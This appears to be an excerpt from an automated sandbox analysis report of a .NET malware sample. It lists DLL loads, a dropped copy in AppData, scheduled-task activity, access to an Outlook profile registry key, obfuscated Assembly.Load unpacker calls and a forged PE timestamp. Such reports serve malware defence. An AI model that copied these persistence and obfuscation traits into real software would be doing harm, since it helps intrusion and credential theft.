Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\OtldpQxzAw.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: OtldpQxzAw.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: OtldpQxzAw.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: OtldpQxzAw.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: RufU.pdbSHA256 source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr
Source:	Binary string: RufU.pdb source: OtldpQxzAw.exe, wiSeRRwvZHTk.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.OtldpQxzAw.exe.418f698.4.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	.Net Code: ehPZEGWR82 System.Reflection.Assembly.Load(byte[])
Source: 0.2.OtldpQxzAw.exe.36ba528.0.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.OtldpQxzAw.exe.4107878.2.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	.Net Code: ehPZEGWR82 System.Reflection.Assembly.Load(byte[])
Source: 0.2.OtldpQxzAw.exe.70f0000.6.raw.unpack, eZ4sQamGRAVEeBKeQQ.cs	.Net Code: ehPZEGWR82 System.Reflection.Assembly.Load(byte[])

Source: OtldpQxzAw.exe

Static PE information: 0x9277E7BE [Thu Nov 14 08:07:26 2047 UTC]

Source: C:\Users\user\Desktop\OtldpQxzAw.exe	Code function: 0_2_06747750 push cs; ret	0_2_06747751
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D7750 push cs; ret	10_2_074D7751
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_074D35AF push cs; retf	10_2_074D360F
Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exe	Code function: 10_2_07CAE71D push FFFFFF8Bh; iretd	10_2_07CAE71F
